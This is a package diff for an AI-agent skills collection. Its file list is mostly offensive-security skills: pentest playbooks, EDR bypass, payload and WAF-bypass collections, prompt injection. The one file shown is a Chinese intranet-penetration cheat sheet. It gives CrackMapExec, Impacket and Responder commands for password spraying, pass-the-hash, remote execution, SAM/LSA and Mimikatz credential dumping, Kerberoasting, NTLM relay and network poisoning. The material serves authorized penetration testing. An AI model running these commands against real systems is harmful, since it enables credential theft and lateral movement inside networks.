opencode-skills-collection 4.0.43 → 4.0.44
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bundled-skills/.antigravity-install-manifest.json +47 -1
- package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
- package/bundled-skills/api-security/SKILL.md +205 -0
- package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
- package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
- package/bundled-skills/apk-reverse/SKILL.md +438 -0
- package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
- package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
- package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
- package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
- package/bundled-skills/attack-chain/SKILL.md +185 -0
- package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
- package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
- package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
- package/bundled-skills/attack-chain/references/phases.md +490 -0
- package/bundled-skills/binary-diff/SKILL.md +320 -0
- package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
- package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
- package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
- package/bundled-skills/case-review/SKILL.md +167 -0
- package/bundled-skills/cloud-k8s/SKILL.md +124 -0
- package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
- package/bundled-skills/code-audit/SKILL.md +92 -0
- package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
- package/bundled-skills/database-security/SKILL.md +81 -0
- package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
- package/bundled-skills/diagram-generator/SKILL.md +199 -0
- package/bundled-skills/diagram-generator/references/README.md +3 -0
- package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
- package/bundled-skills/digital-forensics/SKILL.md +93 -0
- package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
- package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
- package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
- package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
- package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
- package/bundled-skills/docs/sources/sources.md +9 -0
- package/bundled-skills/docs/users/aas-core.md +1 -1
- package/bundled-skills/docs/users/bundles.md +1 -1
- package/bundled-skills/docs/users/claude-code-skills.md +1 -1
- package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
- package/bundled-skills/docs/users/kiro-integration.md +1 -1
- package/bundled-skills/docs/users/usage.md +3 -3
- package/bundled-skills/docs/users/visual-guide.md +4 -4
- package/bundled-skills/docs-generator/SKILL.md +197 -0
- package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
- package/bundled-skills/docs-generator/references/templates.md +102 -0
- package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
- package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
- package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
- package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
- package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
- package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
- package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
- package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
- package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
- package/bundled-skills/email-security/SKILL.md +81 -0
- package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
- package/bundled-skills/firmware-pentest/SKILL.md +381 -0
- package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
- package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
- package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
- package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
- package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
- package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
- package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
- package/bundled-skills/hardware-security/SKILL.md +80 -0
- package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
- package/bundled-skills/ida-reverse/SKILL.md +401 -0
- package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
- package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
- package/bundled-skills/identity-federation/SKILL.md +81 -0
- package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
- package/bundled-skills/instructree/SKILL.md +94 -0
- package/bundled-skills/js-reverse/SKILL.md +239 -0
- package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
- package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
- package/bundled-skills/js-reverse/references/env-patching.md +6 -0
- package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
- package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
- package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
- package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
- package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
- package/bundled-skills/js-reverse/references/output-contract.md +9 -0
- package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
- package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
- package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
- package/bundled-skills/llm-security/SKILL.md +160 -0
- package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
- package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
- package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
- package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
- package/bundled-skills/macos-reverse/SKILL.md +85 -0
- package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
- package/bundled-skills/malware-analysis/SKILL.md +311 -0
- package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
- package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
- package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
- package/bundled-skills/mobile-reverse/SKILL.md +222 -0
- package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
- package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
- package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
- package/bundled-skills/muapi-media/SKILL.md +311 -0
- package/bundled-skills/ot-ics/SKILL.md +117 -0
- package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
- package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
- package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
- package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
- package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
- package/bundled-skills/pentest-tools/SKILL.md +346 -0
- package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
- package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
- package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
- package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
- package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
- package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
- package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
- package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
- package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
- package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
- package/bundled-skills/pentest-tools/references/payloads.md +32 -0
- package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
- package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
- package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
- package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
- package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
- package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
- package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
- package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
- package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
- package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
- package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
- package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
- package/bundled-skills/protocol-reverse/SKILL.md +108 -0
- package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
- package/bundled-skills/pwn-chain/SKILL.md +209 -0
- package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
- package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
- package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
- package/bundled-skills/radare2/SKILL.md +460 -0
- package/bundled-skills/radare2/references/cheatsheet.md +129 -0
- package/bundled-skills/radio-sdr/SKILL.md +77 -0
- package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
- package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
- package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
- package/bundled-skills/reverse-engineering/SKILL.md +213 -0
- package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
- package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
- package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
- package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
- package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
- package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
- package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
- package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
- package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
- package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
- package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
- package/bundled-skills/reverse-engineering/references/languages.md +499 -0
- package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
- package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
- package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
- package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
- package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
- package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
- package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
- package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
- package/bundled-skills/reverse-engineering/references/tools.md +546 -0
- package/bundled-skills/supply-chain-security/SKILL.md +180 -0
- package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
- package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
- package/bundled-skills/thick-client/SKILL.md +104 -0
- package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
- package/bundled-skills/threat-hunting/SKILL.md +94 -0
- package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
- package/bundled-skills/threat-intelligence/SKILL.md +176 -0
- package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
- package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
- package/bundled-skills/wifi-wireless/SKILL.md +80 -0
- package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
- package/bundled-skills/windows-ad/SKILL.md +109 -0
- package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
- package/package.json +1 -1
- package/skills_index.json +1214 -2
|
@@ -0,0 +1,873 @@
|
|
|
1
|
+
# 内网渗透
|
|
2
|
+
|
|
3
|
+
> ⚠️ Security notice: examples below may include download-and-execute patterns, shown for defensive understanding and authorized testing only. Never run them against systems you do not own.
|
|
4
|
+
|
|
5
|
+
|
|
6
|
+
_19 条工具命令_
|
|
7
|
+
|
|
8
|
+
### CrackMapExec `crackmapexec`
|
|
9
|
+
_内网渗透瑞士军刀_
|
|
10
|
+
|
|
11
|
+
**Step 0**
|
|
12
|
+
> 扫描网段内的SMB服务
|
|
13
|
+
_platform: linux_
|
|
14
|
+
```
|
|
15
|
+
crackmapexec smb 192.168.1.0/24
|
|
16
|
+
```
|
|
17
|
+
**语法解析:**
|
|
18
|
+
- `crackmapexec` — CME工具 _command_
|
|
19
|
+
- `smb` — SMB协议模块 _value_
|
|
20
|
+
|
|
21
|
+
**Step 0**
|
|
22
|
+
> 使用单个密码测试多个用户
|
|
23
|
+
_platform: linux_
|
|
24
|
+
```
|
|
25
|
+
crackmapexec smb 192.168.1.0/24 -u users.txt -p Password123
|
|
26
|
+
```
|
|
27
|
+
**语法解析:**
|
|
28
|
+
- `-u` — 用户名或用户文件 _parameter_
|
|
29
|
+
- `-p` — 密码或密码文件 _parameter_
|
|
30
|
+
|
|
31
|
+
**Step 0**
|
|
32
|
+
> 测试凭证是否有效
|
|
33
|
+
_platform: linux_
|
|
34
|
+
```
|
|
35
|
+
crackmapexec smb 192.168.1.0/24 -u admin -p password
|
|
36
|
+
```
|
|
37
|
+
|
|
38
|
+
**Step 0**
|
|
39
|
+
> 使用哈希进行认证
|
|
40
|
+
_platform: linux_
|
|
41
|
+
```
|
|
42
|
+
crackmapexec smb 192.168.1.0/24 -u admin -H NTHASH
|
|
43
|
+
```
|
|
44
|
+
**语法解析:**
|
|
45
|
+
- `-H` — NTLM哈希 _parameter_
|
|
46
|
+
|
|
47
|
+
**Step 0**
|
|
48
|
+
> 在目标机器执行命令
|
|
49
|
+
_platform: linux_
|
|
50
|
+
```
|
|
51
|
+
crackmapexec smb 192.168.1.100 -u admin -p password -x "whoami"
|
|
52
|
+
```
|
|
53
|
+
**语法解析:**
|
|
54
|
+
- `-x` — 执行命令 _parameter_
|
|
55
|
+
|
|
56
|
+
**Step 0**
|
|
57
|
+
> 在目标机器执行PowerShell
|
|
58
|
+
_platform: linux_
|
|
59
|
+
```
|
|
60
|
+
crackmapexec smb 192.168.1.100 -u admin -p password -X "Get-Process"
|
|
61
|
+
```
|
|
62
|
+
**语法解析:**
|
|
63
|
+
- `-X` — 执行PowerShell命令 _parameter_
|
|
64
|
+
|
|
65
|
+
**Step 0**
|
|
66
|
+
> 导出SAM数据库
|
|
67
|
+
_platform: linux_
|
|
68
|
+
```
|
|
69
|
+
crackmapexec smb 192.168.1.100 -u admin -p password --sam
|
|
70
|
+
```
|
|
71
|
+
|
|
72
|
+
**Step 0**
|
|
73
|
+
> 导出LSASS凭证
|
|
74
|
+
_platform: linux_
|
|
75
|
+
```
|
|
76
|
+
crackmapexec smb 192.168.1.100 -u admin -p password --lsa
|
|
77
|
+
```
|
|
78
|
+
|
|
79
|
+
**Step 0**
|
|
80
|
+
> 执行Mimikatz模块
|
|
81
|
+
_platform: linux_
|
|
82
|
+
```
|
|
83
|
+
crackmapexec smb 192.168.1.100 -u admin -p password -M mimikatz
|
|
84
|
+
```
|
|
85
|
+
**语法解析:**
|
|
86
|
+
- `-M` — 指定模块 _parameter_
|
|
87
|
+
|
|
88
|
+
**Step 0**
|
|
89
|
+
> 通过WinRM执行命令
|
|
90
|
+
_platform: linux_
|
|
91
|
+
```
|
|
92
|
+
crackmapexec winrm 192.168.1.100 -u admin -p password
|
|
93
|
+
```
|
|
94
|
+
|
|
95
|
+
---
|
|
96
|
+
|
|
97
|
+
### Impacket `impacket`
|
|
98
|
+
_Python网络协议库_
|
|
99
|
+
|
|
100
|
+
**Step 0**
|
|
101
|
+
> PsExec远程执行
|
|
102
|
+
_platform: linux_
|
|
103
|
+
```
|
|
104
|
+
psexec.py domain/user:password@target_ip
|
|
105
|
+
```
|
|
106
|
+
|
|
107
|
+
**Step 0**
|
|
108
|
+
> WMI远程执行
|
|
109
|
+
_platform: linux_
|
|
110
|
+
```
|
|
111
|
+
wmiexec.py domain/user:password@target_ip
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
**Step 0**
|
|
115
|
+
> 通过计划任务执行
|
|
116
|
+
_platform: linux_
|
|
117
|
+
```
|
|
118
|
+
atexec.py domain/user:password@target_ip "command"
|
|
119
|
+
```
|
|
120
|
+
|
|
121
|
+
**Step 0**
|
|
122
|
+
> SMB远程执行
|
|
123
|
+
_platform: linux_
|
|
124
|
+
```
|
|
125
|
+
smbexec.py domain/user:password@target_ip
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
**Step 0**
|
|
129
|
+
> 导出所有凭证
|
|
130
|
+
_platform: linux_
|
|
131
|
+
```
|
|
132
|
+
secretsdump.py domain/user:password@target_ip
|
|
133
|
+
```
|
|
134
|
+
|
|
135
|
+
**Step 0**
|
|
136
|
+
> Kerberoasting攻击
|
|
137
|
+
_platform: linux_
|
|
138
|
+
```
|
|
139
|
+
GetUserSPNs.py domain/user:password -dc-ip dc_ip -request
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
**Step 0**
|
|
143
|
+
> AS-REP Roasting攻击
|
|
144
|
+
_platform: linux_
|
|
145
|
+
```
|
|
146
|
+
GetNPUsers.py domain/ -usersfile users.txt -format hashcat
|
|
147
|
+
```
|
|
148
|
+
|
|
149
|
+
**Step 0**
|
|
150
|
+
> NTLM中继攻击
|
|
151
|
+
_platform: linux_
|
|
152
|
+
```
|
|
153
|
+
ntlmrelayx.py -tf targets.txt -smb2support
|
|
154
|
+
```
|
|
155
|
+
|
|
156
|
+
**Step 0**
|
|
157
|
+
> MSSQL客户端
|
|
158
|
+
_platform: linux_
|
|
159
|
+
```
|
|
160
|
+
mssqlclient.py domain/user:password@target_ip
|
|
161
|
+
```
|
|
162
|
+
|
|
163
|
+
**Step 0**
|
|
164
|
+
> 通过LSA枚举用户
|
|
165
|
+
_platform: linux_
|
|
166
|
+
```
|
|
167
|
+
lookupsid.py domain/user:password@target_ip
|
|
168
|
+
```
|
|
169
|
+
|
|
170
|
+
---
|
|
171
|
+
|
|
172
|
+
### Responder `responder`
|
|
173
|
+
_LLMNR/NBT-NS/MDNS Poisoner_
|
|
174
|
+
|
|
175
|
+
**Step 0**
|
|
176
|
+
> 启动Responder监听
|
|
177
|
+
_platform: linux_
|
|
178
|
+
```
|
|
179
|
+
responder -I eth0
|
|
180
|
+
```
|
|
181
|
+
|
|
182
|
+
**Step 0**
|
|
183
|
+
> 被动分析模式
|
|
184
|
+
_platform: linux_
|
|
185
|
+
```
|
|
186
|
+
responder -I eth0 -A
|
|
187
|
+
```
|
|
188
|
+
|
|
189
|
+
**Step 0**
|
|
190
|
+
> 启用WPAD代理攻击
|
|
191
|
+
_platform: linux_
|
|
192
|
+
```
|
|
193
|
+
responder -I eth0 -wF
|
|
194
|
+
```
|
|
195
|
+
|
|
196
|
+
**Step 0**
|
|
197
|
+
> 启用Finger服务
|
|
198
|
+
_platform: linux_
|
|
199
|
+
```
|
|
200
|
+
responder -I eth0 -f
|
|
201
|
+
```
|
|
202
|
+
|
|
203
|
+
**Step 0**
|
|
204
|
+
> 禁用SMB服务
|
|
205
|
+
_platform: linux_
|
|
206
|
+
```
|
|
207
|
+
responder -I eth0 --disable-smb
|
|
208
|
+
```
|
|
209
|
+
|
|
210
|
+
**Step 0**
|
|
211
|
+
> 查看捕获的哈希
|
|
212
|
+
_platform: linux_
|
|
213
|
+
```
|
|
214
|
+
cat /usr/share/responder/logs/*.txt
|
|
215
|
+
```
|
|
216
|
+
|
|
217
|
+
**Step 0**
|
|
218
|
+
> 启用DHCP欺骗
|
|
219
|
+
_platform: linux_
|
|
220
|
+
```
|
|
221
|
+
responder -I eth0 -D
|
|
222
|
+
```
|
|
223
|
+
|
|
224
|
+
---
|
|
225
